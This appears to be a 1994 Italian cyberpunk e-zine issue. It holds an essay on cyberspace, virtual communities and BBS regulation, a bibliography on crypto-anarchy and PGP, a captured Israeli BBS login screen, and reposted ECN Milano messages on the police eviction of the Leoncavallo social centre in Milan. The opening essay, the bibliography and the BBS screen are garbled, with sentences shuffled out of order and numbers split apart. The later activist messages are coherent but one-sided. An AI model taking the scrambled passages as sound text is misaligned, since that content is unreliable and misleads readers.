Spettacolo e' appena cominciato. si esprimono gli aspetti piu' conviviali: cyber-cops. ovunque si incontri una TAZ accogliente. risiede in pochi bytes di dati duplicabili all'infinito e ovunque. verra' cablato a forza tra qualche tempo o morira' di fame e di stenti. un luogo ancora libero protetto da una barricata digitale in grado di nasconderlo per qualche tempo alla vista e alle coscienze del mondo esterno. sull'hacking e la pirateria software. in cui tutti i cittadini sono "uguali" di fronte alla Legge. le comunita' virtuali come The WELL e come SPUNK Press. le virtual communities e tutto il resto. potere e necessita' di chiarezza. cyber-junkies. E' la vecchia danza tra l'individuo e il suo ambiente. Chi non si cabla oggi. 5. con le sue strutture di controllo e i suoi meccanismi di regolazione.000 nodi distribuiti capillarmente su tutto il globo) prevede che ogni sua conferenza elettronica abbia un regolamento formale scritto e un moderatore che ne controlli l'applicazione al contrario. Il mondo terreno si e' accorto del ciberspazio. che ci piaccia o no. Perfino per la Libera Repubblica del Ciberspazio. la democrazia elettronica. gli piace e sta clonando se' stesso in rete. il piu' esteso network amatoriale (con 20. per le quali si prevede l'obbligo di una concessione apposita. adesso circolano proposte per regolamentare il mondo delle BBS amatoriali. comunita' e societa' convivono gomito a gomito. i gruppi di pressione che si stanno formando anche in Italia a favore dei diritti civili in rete.

documento elettronico. Achieving Electronic Privacy. The Crypto Anarchist Manifesto. 1988 documento ===================================================================== PUBBLICITA' REGRESSO -------------------ATD CARRIER 28.C. Sociologia del Ciberspazio: la costruzione sociale della realta' sulle reti telematiche. Addison-Wesley.T.Luc Pac BIBLIOGRAFIA ESSENZIALE: ======================== (tutti i documenti elettronici sono disponibili su vari nodi della rete Cybernet) Sui rapporti tra istituzioni pubbliche e ciberspazio: ----------------------------------------------------EFFector Online. elettronico. Sugli aspetti sociali dell'interazione in rete: ----------------------------------------------Howard Rheingold. o Connected to Node 4 at 9600 . May.800/VFC o Locking Com 1 at 38400. A Cypherpunk's Manifesto. 1993 Timothy C. in preparazione.21a (c)Copyright The H. bollettino elettronico. Scientific American. agosto 1992 Su Cryptoanarchy e Cypherpunks: ------------------------------Chuck Hammil. 1993 Luc Pac. The Virtual Community. o Connected at 28. 1994 Sulla crittografia a chiave pubblica: ------------------------------------PGP Pretty Good Privacy User's Manual (allegato al pacchetto PGP) David Chaum. The White House E-Mail Frequently Asked Questions. tutti i volumi dal 1992 al 1994. From Crossbows to Cryptography: Thwarting the State Via Technology.8.800 CONNECT 28. Corporation 01/31/94 . documento elettronico.1.800/VFC ---------------------------------------------------------------------ProMatrix DOS Shell Version . 1987 Eric Hughes. documento elettronico.N. 1993.

4) Comment us for any problems or complains.4K by the price of regular registration. Speriamo. Inoltre. it will be wise to get one yourself.8K . you can get your own files wormed up. come dire .350 Nis for average DISC).Moonweed 1992-93 Licensed To [ One Man Crew ] C:\1MC>1mc 1) Here are NODE #1 NODE #2 NODE #3 NODE #4 NODE #5 NODE #6 the current Lines setup and some notes on each ZOOM VFAST 28.Articolo 11 LeOnCaVaLlO ----------Solidarieta' ad un Gruppo che lotta per la LIBERTA' =================================================== I messaggi che seguono provengono da Decoder BBS.. postati dalla rete ECN. le forze dell'ordine si muovono in modo molto . di poter fare qualcosa anche noi per far conoscere alla comunita' Hacker/Cyberpunk la realta' delle cose. by only $60. or by leaving a MSG in the Mail-Box.4K . and this bbs will be getting new and new modems and will switch to all 28. Leggerli mi ha fatto molto incazzare perche' mi sono reso conto che di tutti questi casini a Milano la stampa non ha fatto sapere assolutamente NIENTE.T. -------------------------MESSAGGI-----------------------------------------Area: News dai Centri Sociali Msg#: 5264 From: ECN Milano To: tutti Subj: parco lambro '94 Date: 16 Jul 94 20:38 Read: Yes Replied: No Mark: .(c)Copyright Hi. Leave me message if you want amazing fast 28.4K . and hell it working great in israel.4K .8K .Running under ProMatrix nodes: +972-4-773663 +972-4-772638 +972-4-772860 +972-4-773425 +972-4-773896 +972-4-771706 2) Now that the ZOOM modems are working fine. 3) Special CD-ROM offer: Real soon you might be able to get your favorite CD-ROMs at the prices of 120Nis (Cost in a store upto 250 . we are always around to hear you. contestabile.Running under ProMatrix ZOOM VFAST 28.Running under ProMatrix RACKAL-MILGO 14.8K modem.. Also. All The Best Bonijoni ----------------------------------------------------------------The Black Page . con questa ns rivista.8K at the end. We can be reached via private mail on this BBS. Settembre 1994 . a quanto pare.8K will let you download as twice as at 14.Running under Intermail USR SPORSTER 14.4K .Running under ProMatrix INTEL v32b 14. For More info leave me a message.Numero 0...Running under ProMatrix USR SPORSTER 14. For Registers by time: 28.

Il termine provvisorio di questa situazione e' giunto.00 di oggi 16 luglio il comandante dei vigili urbani in compagnia del capo della Digos e del Vicequestore si e' presentato all'iniziativa di festa e di lotta in corso da ieri in via Salomone di fronte al centro sociale Leoncavallo. decretino la militarizzazione dei quartieri. producano situazioni di gravissimo pericolo per l'incolumita' di centinaia di persone. in cui si straparla incredibilmente e ancora di sgomberi di centri sociali. Intendiamo continuare l'iniziativa in corso mantenendo tutti gli appuntamenti di dibattito e di lotta gia' annunciati e che prevedono per i prossimi giorni: . E' incredibile che nella Milano del '94 strutture passibili di sole sanzioni amministrative mobilitino migliaia di uomini. mentre si discutera' luned in consiglio comunale. Solo l'immediata reazione dei presenti e probabilmente la valutazione delle gravissime conseguenze che avrebbe avuto un attacco di polizia contro centinaia di persone esasperate dagli infiniti divieti che opposti dal loro sindaco in questi mesi. destinati a diventare una versione "aggiornata" dell'oratorio. si escludono gli attuali operatori che da anni lavorano all'interno dei servizi sopperendo con la loro professionalita' alla carenza di risorse frutto della pluriennale politica di smantellamento dei servizi sociali. una citta' che ha vietato in sei mesi le manifestazioni di piazza a questo stesso aggregato. case occupate.luned 18 luglio . su proposta del PPI e di alcuni rappresentanti della lega. Questo con il preciso intento di cancellare dai territori metropolitani qualunque spazio di autogestione e autogoverno che si ponga in modo conflittuale rispetto alle politiche economiche. per quel che riguarda la gestione in comodato e quindi in forma privatistica dei centri sociali territoriali. Quindi. centri sociali. luoghi in cui raccogliere consensi e omologare le fasce giovanili.SI CERCANO I MORTI PER TRE BARACCHE DI LAMIERA Alle 18. alle associazioni e alle cooperative legate alla Compagnia delle opere. sociali e culturali della giunta Formentini. con la dichiarazione dei responsabili dell'ordine pubblico. di voler aspettare la giornata di domani per eseguire la volonta' di Formentini. oltre la semplice privatizzazione dell'accesso ai servizi con il pagamento del biglietto di ingresso. disoccupati appartenenti a quel composito movimento di associazioni. Tale progetto passa anche attraverso la ridefinizione delle stesse strutture territoriali del decentramento. e in questi ultimi tempi in modo ossessivo ha evitato che la situazione degenerasse. l'assegnazione di 9 miliardi. esigendo lo smontaggio di tre box di lamiera costruiti sul marciapiede della medesima via. dai servizi alle persone a quelli culturali e ricreativi. Ma una citta' in cui in un anno sono arrivate quasi 800 denunce a carico di centinaia di giovani. lavoratori fuori e dentro la fabbrica. Al rifiuto unanime opposto verbalmente e pacificamente dai presenti si e' mosso lo spropositato apparato che da giorni incombe sulle migliaia di giovani e meno che quotidianamente hanno cominciato a frequentare l'iniziativa "Nessuna giustizia nessuna pace". gia' stanziati per le politiche giovanili.

LEONCAVALLO. l'ennesima ostentazione della volonta' di annientare qualsiasi realta' che rifiuta logiche di omologazione. IN CUI SI E' SVILUPPATA IN QUESTI GIORNI LA FESTA. Milano. OPERANDO LO SMONTAGGIO ED IL SEQUESTRO DELLE STRUTTURE LEGGERE SISTEMATE NELLA "STRISCIA DI GAZA". per impedire lo sgombero di alcuni appartamenti previsto per oggi.S.marted 19 luglio ore 11. HA ISOLATO E MILITARIZZATO GRAN PARTE DELLA ZONA DI VIA SALOMONE. CHE DA GIORNI STAZIONANO IN PROSSIMITA' DEL C. di fronte al legittimo esercizio del diritto a costruire momenti di incontro. giorno in cui scade l'assegnazione dei locali della ex-Krupp di via salomone 71 al C. UN NUMERO SPROPOSITATO DI CARABINIERI E AGENTI DI POLIZIA. e' stata oggetto dell'ennesimo e pesantissimo attacco da parte delle truppe inviate dal Sindaco Formentini.30 DI OGGI. che. 16 luglio 1994 Le realta' che partecipano al meeting Msg#: From: To: Subj: 5290 ECN Milano tutti Appello a tutti i compagni !!! Date: 18 Jul 94 15:55 Read: Yes Replied: No Mark: "NESSUNA GIUSTIZIA NESSUNA PACE" L'iniziativa di festa e di lotta "nessuna giustizia nessuna pace" promossa da varie realta' antagoniste milanesi. RICONFERMANDO TUTTI GLI APPUNTAMENTI IN PROGRAMMA. HA RIBADITO LA FERMA VOLONTA' DI MANTENERE IL PROGRAMMA ORIGINARIO. Questo sgombero e' stato rimandato a mercoledi' 20 luglio. Tutto questo mentre si stava svolgendo un presidio di fronte alla casa occupata di via dei transiti 28.00 presidio in difesa della casa occupata di via dei transiti 18 sotto sgombero ore 17. CON L'USO DELLA VIOLENZA LEGALIZZATA. SVOLTASI NELLE PRIME ORE DEL POMERIGGIO. FACCIAMO APPELLO A TUTTI I COMPAGNI AFFINCHE' SIANO PRESENTI CON LA MASSIMA MOBILITAZIONE E LA MASSIMA DETERMINAZIONE ALLE .00 saremo presenti in Consiglio comunale .S.00 presidio davanti al tribunale in concomitanza con la seconda udienza del processo a carico di 17 compagni per iniziative ANTIFASCISTE. ALLE 7. di dibattito e confronto pubblici. L'AREA LARGA POCHI METRI POSTA DI FRONTE AL CENTRO SOCIALE DI VIA SALOMONE. E' il prosieguo della pratica di negazione degli spazi ormai costante in questa citta'. SI VOGLIONO CANCELLARE ESPERIENZE UNICHE DI DEMOCRAZIA DIRETTA E DI AUTOGESTIONE DEL TERRITORIO. di festa. Leoncavallo.ore 6. L'ASSEMBLEA DELLE LE REALTA' ORGANIZZATRICI DELL'INIZIATIVA. IN QUESTO LUGLIO MILANESE IN CUI. INGENTISSIMO E' IL DANNO ECONOMICO. OLTRE ALLA PROVOCAZIONE E ALL'ATTACCO POLITICO. ha dato una soluzione militare a quello che si configurava come un semplice reato amministrativo. ed in cui inoltre le 8 famiglie di via Rilke che da piu' di 45 giorni occupano il consiglio di zona 13 ne dovranno lasciare i locali. CON L'AUSILIO DELLA PROTEZIONE CIVILE E DELLA POLIZIA MUNICIPALE.

che pensa solamente ai suoi dissidenti interni. costretti a dormire da 50 giorni dentro il Consiglio di zona 13. 29/7/94 Questa sera alle 20.. . con tutti i termini atti a indicare un vero e proprio piano di attacco verso persone che se si sono esposte fino a mettersi sulla strade perche' profondamente convinte di avere tutte le carte in regola per poter chiedere una casa per diritto. a non risolvere il problema delle abitazioni in questa citta' coprendo ancora una volta il patrimonio socialista attraverso la assegnazioni dubbiose partitrocratiche e in odore di clientelismo.tel. GLI SFRATTATI DI VIA RILKE.. CHE PERNOTTANO DA DUE MESI NEL CONSIGLIO DI ZONA 13 CONTINUANO LA LORO OCCUPAZIONE E CHIEDONO LA SOLIDARIETA' DI TUTTE LE PERSONE COSCIENTI ED INTELLIGENTI. La violenza delle cosidette forze dell'ordine e' arrivata al punto di pestare con "armi alla mano" gli occupanti. e' la conseguenza tangibile e visibile di un sindaco totalmente incompetente per quanto riguarda i bisogni primari dei cittadini di Milano. Va presa una posizione netta nei confronti di Formentini che non ha saputo risolvere politicamente il problema della casa ma ancora una volta col manganello della polizia.30 un gran numero di agenti delle forze dell'ordine hanno caricato violentemente le famiglie che da 48 ore bloccavano parzialmente il Viale Ungheria chiedendo una soluzione da parte del Comune..fax 02 26820360 Radio Onda d'Urto . 02 58014348 . Milano. 02 2827494 / 2825884 Msg#: From: To: Subj: 5746 Date: 30 Jul 94 20:04 Ecn Milano Read: Yes Replied: No All Mark: La polizia carica il presidio davanti al consiglio di zona 13 (MI) Quando il diritto alla casa diventa l'ennesimo attacco repressivo. SINCERAMENTE DEMOCRATICHE AFFINCHE' SI COSTRINGA IL SINDACO DI MILANO A FARE IL SINDACO DI TUTTI I CITTADINI E NON DI CHI ESERCITA I POTERI FORTI IN QUESTA CITTA'. arrestando 25 persone che stavano manifestando contro il silenzio che la stampa di regime e il nuovo potere cittadino tanto coltivano sui problemi primari che affliggono questa citta' come la casa e il lavoro. Dopo essere state sgomberate dalle loro abitazioni.tel. Questa azione vergognosa apostrofata anche dagli abitanti del quartiere che gridavano vergogna nei confronti di chi operava tanto brutalita' nei confronti dei senza casa. dopo essere stati definiti da autorita' e giornali mafiosi.PROSSIME SCADENZE DI LOTTA: MERCOLEDI' 20 LUGLIO MOBILITAZIONE GENERALE CONTRO GLI SGOMBERI SABATO 23 LUGLIO MANIFESTAZIONE NAZIONALE LE REALTA' ORGANIZZATRICI DEL MEETING "NESSUNA GIUSTIZIA NESSUNA PACE" MILANO. dopo i numerosi colloqui richiesti alle autorita' competenti. 18 LUGLIO 1994 Per informazioni Centro Sociale Leoncavallo .

Milano, 29 luglio '94 Msg#: From: To: Subj: 6068 ECN Milano all sgomberato il Leoncavallo Date: 09 Aug 94 14:17 Read: Yes Replied: No Mark:

questa mattina alle ore 10.00, trecento tra poliziotti e carabinieri hanno sgomberato il Centro sociale Leoncavallo. All'interno si trovavano 5 compagni, che sono stati solo identificati. Poi il materiale del centro sociale e' stato portato in un deposito comunale. il questore Serra ha dichiarato di non vedere nessun problema sociale ne sedi alternative. E' stato solo eseguito uno sfratto. Gli occupanti verranno denunciati per violazione di una ordinanza dell'autorita, quella che imponeva il rilascio dell'immobili. Alle ore 14 la polizia circonda ancora il centro sociale e si sta tentando un presidio al parco Alessandrini, vicino all'ortomercato. Il boia sindaco Formentini ha dichiarato la sua soddisfazione, definendo definitivamente morto il centro sociale. Msg#: From: To: Subj: 6070 ECN Milano tutti sgomberato centro sociale leoncavallo Date: 09 Aug 94 15:45 Read: Yes Replied: No Mark:

milano, 9 agosto 1994 comunicato stampa alle 10.00 di questa mattina, in una milano ormai deserta, dopo aver completamente militarizzato la zona est della citta', un ingente numero di ps e cc ha sfondato le porte del Centro Sociale Leoncavallo e sta ora procedendo allo sgombero. Questo e' un atto gravissimo, che evidenzia ulteriormente la precisa volonta' del sindaco formentini e della sua giunta di cancellare definitivamente dal territorio tutte quelle realta' sociali e politiche che, da decenni portano avanti lotte per il diritto alla casa, al reddito, a spazi a uso sociale e collettivo. Questo attacco all'opposizione sociale si sta strutturando a piu' livelli, dalle oltre 850 denunce emesse a carico dei compagni di milano nell'ultimo anno e mezzo, agli sgomberi di case occupate e centri sociali, ai processi. Questi straordinari laboratori di lotte sociali e politiche, di sperimentazione culturale, di aggregazione slegata dalle logiche del profitto, sono l'anima democratica, antifascista e viva di territori ormai consegnati nelle mani della speculazione edilizia, dell'eroina e dei poteri forti di questa citta'. E' fondamentale ribadire a chi ci vorrebbe assenti dai territori, che esperienze come quella del Centro Sociale Leoncavallo, delle case occupate e degli altri centri sociali, non possono venire cancellate dalla storia presente e futura della citta'. Lanciamo quindi un appello a tutte le realta' sociali e politiche, ai compagni, ai frequentatori dei centri sociali, affinche' sia evidente a tutti che queste realta', che negli anni sono state patrimonio di migliaia di persone e intelligenze che le hanno attraversate e arricchite, hano pieno titolo e piena legittimita' ad esistere e non si lasceranno cancellare dai territori nei quali vivono e agiscono da decine di anni. Abbiamo indetto una conferenza stampa per oggi alle ore 14 in via salomone 71.

Indiciamo fin da ora una mobilitazione collettiva !!! Per informazioni: CENTRO SOCIALE LEONCAVALLO tel. 02 26140287 - 0337 328455 fax 02 26820360 nessuna giustizia nessuna pace Msg#: From: To: Subj: 6141 ECN Milano tutti ruspe a villa amantea Date: 10 Aug 94 10:52 Read: Yes Replied: No Mark:

questa mattina alle 8,30 la polizia municipale e' intervenuta con le ruspe a villa amantea, dove ha abbattuto le strutture del tendone di "su la testa" adiacente al Centro Sociale Spazzali che vi svolgeva le proprie iniziative Msg#: From: To: Subj: 6145 Lrkwz ECN Milano Re: sgombero leoncavallo Date: 10 Aug 94 16:22 Read: Yes Replied: No Mark:

ECN Milano il 08-09-94 15:56 scrisse a proposito di 'sgombero leoncavallo' :-) EM> NESSUNA GIUSTIZIA NESSUNA PACE Si puo' telefonare in tanti al 6236 chiedendo della segreteria del sindaco (boiardo) per esprimeere la propria protesta. N.ri alternativi: sindaco-capo segreteria s. 86463515 vice sindaco 865244/877846 purtroppo non mollano il n.ro del fax, si possono solo scrivere lettere. Msg#: From: To: Subj: 6378 Date: 13 Aug 94 15:18 snd Read: Yes Replied: No All Mark: milano 12 agosto - la chiusura di spazi continua

ieri mattina, venerdi' 12 agosto, alle 10,30 le forze dell'ordine hanno nuovamente circondato parco alessandrini x imporre che venissero staccati tutti gli striscioni del leo che erano stati appesi lungo la rete di recinzione del parco, motivazione: propaganda abusiva !!! ridicolo ? abbastanza, se non fosse che CONTEMPORANEAMENTE un nutrito manipolo della polizia municipale provvedeva a sgomberare dai locali del consiglio di zona 13 ( in v.le ungheria - a uno sputa da via salomone ) le 8 famiglie di sfrattati di via rilke che da 2 mesi li stavano occupando ora il consiglio di zona e' saldamente presidiato

dalla polizia municipale. attorno alle 21 ps e cc si sono di nuovo schierati davanti al parco alessandrini per "chiedere" che un furgone, momentaneamente parcheggiato su un prato, venisse spostato :-((( scusate, mi scappa da kagare; adesso telefono un attimo in questura x sapere se posso andare al cesso o se me la devo fare nei pantaloni ... - a presto Msg#: From: To: Subj: 6559 snd All leo Date: 18 Aug 94 22:41 Read: Yes Replied: No Mark:

voila' !!! l'iniziativa di tre giorni di concerti e - forse - altre cose di cui era gia' stata negata l'autorizzazione x parco Alessandrini, non e' stata autorizzata nemmeno nello spiazzo davanti al Centro Sociale Spazzali. Ieri il Questore ha comunicato ad alcuni rappresentanti del Leoncavallo che l'autorizzazione chiesta da 2 consiglieri di RC all'assessorato comunale competente, era stata negata 1. i consiglieri d'opposizione di Rifondazione Comunista 2. chiedono al Comune un'autorizzazione 3. il Questore 4. convoca i rappresentanti del Leo * per dire loro che l'autorizzazione di cui sopra non e' concessa oggi, pikkolo experimendo : * alcuni compagni vanno con un furgone allo Spazzali ( "presidiato" a breve distanza da polizia municipale e forze dell'ordine ) e * appena scaricati 2 pezzi di palco arriva l'esercito "ne' qui ne' la', 'a festa non si fa in tuuutta la citta'" :-) insomma: la digos affermava che dal Comune di Milano e' stata emessa un'ordinanza che interdice qualsiasi spazio, pubblico o privato, in tutta la citta', a qualsiasi genere di manifestazione pubblica che non sia autorizzata, e che quindi loro dovevano intervenire non e' stato possibile prendere visione di detta "ordinanza" subito dopo i vigili urbani hanno accompagnato alcuni tecnici del comune ad ispezionare la costruzione del centro sociale per "verificarne la stabilita'". verifica che ha dato esito positivo, i locali hanno tutti i requisiti di stabilita' necessari per essere abitabili, ma non quelli necessari per ospitare manifestazioni pubbliche. poco piu' tardi u assessore comunale ha dichiarato alla stampa che in ogni caso nell'area antistante il centro sociale spazzali, l'azienda energetica municipale aveva gia' messo in previsione di iniziare DA DOMANI 19 AGOSTO dei lavori di scavo

quindi allo stato attuale dell'arte * I CONCERTI NON CI SARANNO * DOMANI CERCHEREMO COMUNQUE DI "PRENDERCI" LA PIAZZA ANTISTANTE LO SPAZZALI PER FARCI 3 GIORNI DI ASSEMBLEE E DIBATTITI O NON SO CHE' - a presto Msg#: From: To: Subj: 6646 snd All leo/spazzali Date: 21 Aug 94 01:07 Read: Yes Replied: No Mark:

TORDELLI CERCA LO SGOMBERO DELLO SPAZZALI La giornata di dibattiti prevista dal programma della 3 giorni antirazzista convocata dal leo presso il centro sociale spazzali, e' stata caratterizzata da un'imponente dispiegamento forze dell' ordine fatte intervenire dall'assessore leghista Tordelli - sindaco pro tempore durante le vacanze di Formentini ( che anche in sardegna e' stato colpito dall'ormai consueto volantino "in questa citta' circola un uomo pericoloso ..." grazie allo spirito di iniziativa di un gruppo di ragazzi del posto :-). Verso le 19, mentre era in corso l'assemblea dei centri sociali e delle realta' autogestite milanesi, giungeva notizia di un'operazione di ammassamento di mezzi di ps e cc all'ingresso del quartiere. Poco dopo l'intera zona di baggio nel raggio di oltre un chilometro dal centro sociale e' stata chiusa dai vigili urbani, e i mezzi della polizia hanno cominciavato a disporsi lungo le strade che portano al centro sociale. Da alcuni giornalisti che intanto cominciavano ad arrivare si veniva a sapere che il sindaco pro tempore, Tordelli, e il presidente del consiglio comunale, la leghista Gazzola, stavano per arrivare a Baggio, e che lo schieramento di truppa era dovuto alla loro imminente presenza. Spiegazione del tutto incongruente con le dimensioni che stava assumendo il dispiegamento di forze davanti ai nostri occhi. Attorno alle 19,30 i mezzi blindati e truppa a terra iniziavano a circondare l'area ( piuttosto vasta ) in cui si trova il centro sociale. I compagni presenti - oltre un centinaio - hanno immediatamente barricato i lati da cui era possibile l'accesso. Alcuni compagni si recavano dalla Digos per avere spiegazioni, e contemporaneamente sopraggiungeva il consigliere di RC "atomo" Tinelli, da cui si veniva a sapere che il sindaco, dopo aver saputo che ieri sera l'iniziativa si e' svolta regolarmente, e per di piu' con tanto di CONCERTO e grande afflusso di gente ( quando la festa della lega riusciva a malapena a raccogliere un 50/100 persone a sera ), aveva imposto alla polizia l'intervento al fine di operare uno sgombero immediato ( l'area del centro sociale e' di proprieta' comunale ).

Poco dopo giungeva anche il suddetto Tordelli con la Gazzola. In un primo momento hanno cercato con nonchalance di avviarsi verso l'ingresso del centro sociale, ma hanno poi desistito, scoraggiati dall'espressione trucissima dei non pochi compagni che sono andati loro incontro. Intanto la notizia si diffondeva in citta' e cominciava ad arrivare gente, che a piedi riusciva a raggiungere il centro sociale. Il flusso di persone, anche quelle richiamate dall'iniziativa, e' continuato per tutta la sera, raggiungendo presto le dimensioni di ieri, nonostante si dovesse lasciare la macchina molto distante e attraversare diversi blocchi di schieramenti di forze dell' ordine. Si e' deciso di restare tutta la notte ( facendo anche dei turni per dormire ) e di riprendere domani l'iniziativa, con la discussione per prepare la convocazione del corteo nazionale del 10 settembre. Il concerto non si e' potuto svolgere e il centro sociale Spazzali sara' probabilmente ( anzi sicuramente, secondo le valutazioni dei presenti e voci di fonti diverse ) sgomberato nei primi giorni ( lunedi' o martedi' ) della settimana entrante. - a presto Msg#: From: To: Subj: 6762 snd All leo Date: 23 Aug 94 14:08 Read: Yes Replied: No Mark:

strutture e compagni del leoncavallo sono, ancora per qualche giorno, ospiti del centro sociale spazzali, in via amantea, quartiere baggio (mm bandenere + bus 67 ) questa mattina l'azienda elettrica municipale ha staccato acqua ed elettricita' al centro sociale spazzali, e sono inoltre iniziati i lavori delle ruspe x costruire, nell'area un tempo occupata dal tendone di "su la testa", un parcheggio ed una strada ...

Msg#: From: To: Subj:

6763 snd All spazzali

Date: 24 Aug 94 00:49 Read: Yes Replied: No Mark:

acqua e corrente, staccati stamattina come promesso dal sindaco estivo nei giorni scorsi, questo pomeriggio sono stati riattacati lo spazzali e' intestatario di regolari contratti ed ha altrettanto regolarmente pagato le bollette si pensa che che la sospensione delle forniture sia stata dovuta ai lavori di scavo iniziati oggi nello spiazzo dietro al centro sociale, per costruire una strada ed un parcheggio

singoli. nello sgombero del Leoncavallo dai locali della Krupp. ad esempio. o file riguardanti la sfera privata di qualcuno. singoli. se un PC non e' posto sotto sequestro. E' stata data qualche giustificazione o vi siete accorti dell'accaduto solo successivamente? From: ECN Milano Subj: comunicato c. Non riesco a capire a quale titolo e con quale diritto. sia pure temporanea. che hanno provveduto sul posto ad eseguire un accurato backup dell'HD del PC su cui c'era il point ecn del leo ( 45:1917/1.s. ecc. "amministrazione".l'azienda energetica municipale non ha fornito spiegazioni ne' aveva dato formale comunicazione della sospensione.Milano (45:1917/1) SEEN-BY: 1/1 5/1 9/1 10/2 999/999 1000/1 4 1100/1 1200/1 2 5 6 1400/1 SEEN-BY: 1500/1 1600/1 1800/1 1900/1 1917/1 2 3 11 2000/1 Msg#: From: To: Subj: 6205 Gomma snd sgombero point ecn-leoncavallo Date: 11 Aug 94 20:44 Read: Yes Replied: No Mark: 6146 snd All sgombero point ecn-leoncavallo Date: 10 Aug 94 16:09 Read: Yes Replied: No Mark: Ciao snd: > > > > > due "experti informatici".71 ) e tutto il materiale dei vari collettivi. dei servizi Msg#: From: To: Subj: ola' una piccola curiosita' "a latere" dello sgombero del leo: i digotti. o non sia indagato per qualche ragione il proprietario del PC. Sui giornali il questore Serra ha affermato che niente era stato posto sotto sequestro. Dentro la macchina vi potevano essere corrispodenze private. che hanno provveduto sul posto ad eseguire un accurato backup dell'HD del PC su cui c'era il point ecn del leo ( 45:1917/1. gruppi. gruppi. Com'e' possibile dunque. "amministrazione".71 ) e tutto il materiale dei vari collettivi. leoncavallo Comunicato Stampa Read: Yes Replied: No . si sono portati anche due "experti informatici". che i dati vengano copiati e trattenuti? Mi sembra una palese violazione del diritto alla privacy. ecc. piu' tardi nella giornata ci e' stato possibile portare via il PC ! Origin: European Counter Network .

avrebbe consentito l'allocazione di decine di realta' associative e l'esplicazione di innumerevoli servizi. Dopo la farsa intrapresa dal sindaco d'agosto Tordelli allo scopo di debellare l'illegalita' nella citta' di Milano e gli avversari politici dell'amministrazione. ragione vorrebbe che venisse risparmiata alla citta' una penosa e rischiosa replica. tra l'altro. bensi' migliorie. Tutt'altra cosa sono i danni arrecati allo stabile dalla polizia che. delle liberta' di organizzazione ed espressione politica. Rileviamo inoltre che la spesa sostenuta dallo stato al fine di consentire sulla vicenda del Leoncavallo la speculazione di molteplici parti politiche. un presidio permanente dal giorno 27 agosto al giorno 4 settembre. hanno demolito muri e divelto porte nell'esecuzione della "difficile" operazione sgombero del 9 agosto. a tale proposito abbiamo sempre rilevato come non possano considerarsi danni. si terra' in via Bertelli. da anni in stato di totale e colpevole abbandono. 23 agosto 1994 Centro Sociale Leoncavallo -!! Origin: European Counter Network . le trasformazioni apportate al fine di trasformare l'uso di detto immobile al fine di renderlo atto ad accogliere attivita' di tipo sociale e comunitario.Milano (45:1917/1) SEEN-BY: 1/1 5/1 9/1 30/1 1000/1 4 1100/1 1200/1 5 7 1400/1 1500/3 1600/1 SEEN-BY: 1800/1 1900/1 1917/1 2 3 11 2000/1 Msg#: From: To: Subj: 6887 ECN Milano tutti com. nel corso dei tre giorni di iniziativa tenutasi presso il centro sociale Spazzali di Baggio. senza scrupolo alcuno.Nella mattina di oggi. Milano. alcune. mercoledi' 24 agosto 1994 il Centro sociale Leoncavallo ha presentato alla Questura di Milano un preavviso per lo svolgimento di una manifestazione pubblica. sistematica in questa citta'. a fianco dell'anfiteatro del Parco della Martesana. Leggiamo inoltre con stupore dalla stampa quotidiana le vicende relative al miliardo di danni che sarebbe stato arrecato alla palazzina di via Salomone 71 di proprieta' della ditta Krupp. nella quale comprendiamo anche la manifestazione nazionale del 10 settembre e tre giorni di iniziativa politico culturali ad essa connessi ( il 9/10/11 settembre ) riteniamo debbano cessare le provocazioni operate dalla giunta di Milano contro le realta' sociali oggetto in questa estate di insensato attacco. stampa Comune di Milano Date: 25 Aug 94 18:14 Read: Yes Replied: No Mark: Comune di Milano Ufficio Stampa . Avvicinandosi la ripresa dell'attivita' produttiva e politica nella citta'. L'iniziativa. A tale scopo non sono previsti atti o attivita' soggette a iter autorizzativi del Comune di Milano: ogni ulteriore divieto allo svolgimento delle iniziative del Centro Sociale leoncavallo ricade pertanto esclusivamente nella violazione. di indiscutibile pregio.

e M. e M.30.F.F.di essere presenti in quelle allre della citta' dove piu' palesi sono il degrado e l'abbandono da parte dell'amministrazione pubblica.30 alle 19. nei giorni 27 e 28 agosto (per due giorni quindi.25 agosto 1994 E' pervenuta all'Amministrazione comunale una richiesta di occupazione di suolo pubblico..M. In alternativa. quotidianamente assolto dai comandi di zona dei Vigili Urbani.30 alle ore 19.S. non essendo possibile concedere il Parco della Martesana. dalle 7. Leoncavallo Date: 25 Aug 94 18:23 Read: Yes Replied: No Mark: Centro Sociale LEONCAVALLO COMUNICATO STAMPA IL RIDICOLO E L'ARBITRIO Milano.piu' volte espressa in questi mesi dai centri sociali autogestiti . sia perche' ne potrebbe derivare un dano al tappeto erboso.M. Nel Parco della Martesana e' sito un anfiteatro da 700 posti e una struttura coperta di 500 mq costruita 2 anni fa da un'impresa edile a compensazione di . in caso di petizioni popolari e raccolte di firme da parte di associazioni e anche di normali cittadini. come di consuetudine con altri Enti e associazioni) per effettuare la raccolta firme. con un banchetto per la raccolta di firme che avrebbe dovuto tenersi da sabato 27 agosto a domenica 4 settembre in via Bertelli presso il Parco della Martesana. 25 agosto 1994 Nella giornata di oggi il Comando dei Vigili Urbani ha dato risposta alla richiesta di autorizzazione per "occupazione di suolo pubblico". l'occupazione di suolo pubblico in piazza Lima. per un presidio in via Bertelli (parco Martesana). L'Amministrazione comunale ha ritenuto di non accogliere la richiesta. La concessione e' subordinata al rispetto dei regolamenti vigenti ed e' revocabile in qualsiasi momento. Si tratta di un normale atto amministrativo. dalle ore 14 di sabato 27 agosto alle 23. nel pomeriggio di oggi. nel corso di un presidio permanente. e M. dalle ore 7. I Vigili Urbani hanno comunicato che l'Assessorato al Traffico. l'Amministrazione ha concesso ai signori D. avanzata "secondo i termini di legge" dal Centro Sociale Leoncavallo. adducendo quale giustificazione di questo arbitrio che "PER CONSUETUDINE a Milano le raccolte di firme si fanno in piazza Lima" !!! Ricordiamo che la richiesta di via Bertelli e' motivata dalla precisa volonta' . Trasporti e Viabilita' aveva INVECE autorizzato un banchetto in piazza Lima. da parte dei signori D.00 di domenica 4 settembre. Le decisioni dell'Amministrazione sono state comunicate ai signori D.. per i soli giorni 27 e 28 agosto. sia perche' non usuale che simili manifestazioni si svolgano all'interno di parchi.30. sotto la loro responsabilita'. Msg#: From: To: Subj: 6888 ECN Milano tutti Com Stampa C.

